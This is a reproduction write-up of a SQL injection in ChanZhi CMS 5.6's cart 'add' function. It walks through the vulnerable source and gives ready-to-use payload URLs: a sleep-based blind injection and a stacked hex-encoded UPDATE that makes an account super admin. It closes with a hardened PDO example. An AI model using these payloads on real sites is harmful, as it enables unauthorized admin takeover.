[Reproduction] ChanZhi CMS 5.6 front-end SQL injection + getshell
https://share.weiyun.com/5cbff06337d32a9748d0f1bead5ddbd5
Front-end injection

The add function in /chanzhieps/system/module/cart/control.php:
public function add($product, $count)
{
    if($this->app->user->account == 'guest')
    {
        /* Save info to cookie if user is guest. */
        $this->cart->addInCookie($product, $count);
        $this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess));
    }
    else
    {
        $result = $this->cart->add($product, $count);
        if($result) $this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess));
        $this->send(array('result' => 'fail', 'message' => dao::getError()));
    }
}

In public function add($product, $count), $count is user input.
Let's look at the path taken once a member is logged in, that is:
$result = $this->cart->add($product, $count);
/chanzhieps/system/module/cart/model.php:

public function add($productID, $count)
{
    $hasProduct = $this->dao->select('count(id) as count')->from(TABLE_CART)
        ->where('account')->eq($this->app->user->account)
        ->andWhere('product')->eq($productID)
        ->fetch('count');
    if(!$hasProduct)
    {
        $product = new stdclass();
        $product->product = $productID;
        $product->account = $this->app->user->account;
        $product->count   = $count;
        $this->dao->insert(TABLE_CART)->data($product)->exec();
    }
    else
    {
        $this->dao->update(TABLE_CART)->set("count= count + {$count}")
            ->where('account')->eq($this->app->user->account)
            ->andWhere('product')->eq($productID)
            ->exec();
    }
    return !dao::isError();
}

If the product is already in the cart, the quantity is updated with set("count= count + {$count}"), with $count interpolated straight into the SQL string.
Following into the set function in /chanzhieps/system/lib/base/dao/dao.class.php:

public function set($set)
{
    /* Add ` to avoid keywords of mysql. */
    if(strpos($set, '=') === false)
    {
        $set = str_replace(',', '', $set);
        $set = '`' . str_replace('`', '', $set) . '`';
    }
    $this->sql .= $this->isFirstSet ? " $set" : ", $set";
    if($this->isFirstSet) $this->isFirstSet = false;
    return $this;
}

As you can see, because the string already contains '=', the backtick branch is skipped and the value is appended to $this->sql as-is, with no escaping or type check.
Test it:
http://localhost/www/index.php/cart-add-1-(select%20sleep(10))
The delay is triggered, confirming a time-based blind injection.

This CMS connects to MySQL through PDO, which means stacked (multi-statement) queries can be executed.
http://localhost/www/index.php/cart-add-1-1;set%20@b=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d276675636b796f75273b;prepare%20x%20from%20@b;execute%20x;select%201%20union%20select%201
The UPDATE raises a low-privileged account to super.

Then log in to the backend.
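The root cause walked through above is twofold: $count is spliced into the SET clause as text, and the PDO connection accepts stacked queries. As an added example, not ChanZhi's own code, the following PHP (7 or later assumed) places the unsafe pattern beside a hardened version written against plain PDO; the table name `cart`, the DSN and the credentials are placeholders, and the column names follow the page.

```php
<?php
// Added example, not ChanZhi's own code: the unsafe pattern from
// cart/model.php next to a hardened version written against plain PDO.
// Table name, DSN and credentials are placeholders.

function connect(): PDO
{
    return new PDO(
        'mysql:host=localhost;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
        'DB_USER_PLACEHOLDER',
        'DB_PASS_PLACEHOLDER',
        [
            // Server-side prepares: bound values never become part of the SQL text.
            PDO::ATTR_EMULATE_PREPARES       => false,
            // Reject stacked queries ("1;SET @b=...;PREPARE x FROM @b") at the driver level.
            PDO::MYSQL_ATTR_MULTI_STATEMENTS => false,
            PDO::ATTR_ERRMODE                => PDO::ERRMODE_EXCEPTION,
        ]
    );
}

// Vulnerable: $count is interpolated verbatim, exactly like set("count= count + {$count}"),
// so "(select sleep(10))" or a stacked statement becomes part of the UPDATE.
function addToCartUnsafe(PDO $pdo, string $account, int $productID, string $count): void
{
    $pdo->exec("UPDATE cart SET `count` = `count` + {$count} "
             . "WHERE account = " . $pdo->quote($account) . " AND product = {$productID}");
}

// Hardened: validate $count as a positive integer, then bind every value.
function addToCartSafe(PDO $pdo, string $account, int $productID, $count): void
{
    if (filter_var($count, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) === false) {
        throw new InvalidArgumentException('count must be a positive integer');
    }
    $stmt = $pdo->prepare(
        'UPDATE cart SET `count` = `count` + :count WHERE account = :account AND product = :product'
    );
    $stmt->bindValue(':count',   (int) $count, PDO::PARAM_INT);
    $stmt->bindValue(':account', $account,     PDO::PARAM_STR);
    $stmt->bindValue(':product', $productID,   PDO::PARAM_INT);
    $stmt->execute();
}
```

With the hardened version, a non-integer $count is rejected before any SQL is built, and even a driver misconfiguration elsewhere cannot turn the bound integer into a second statement.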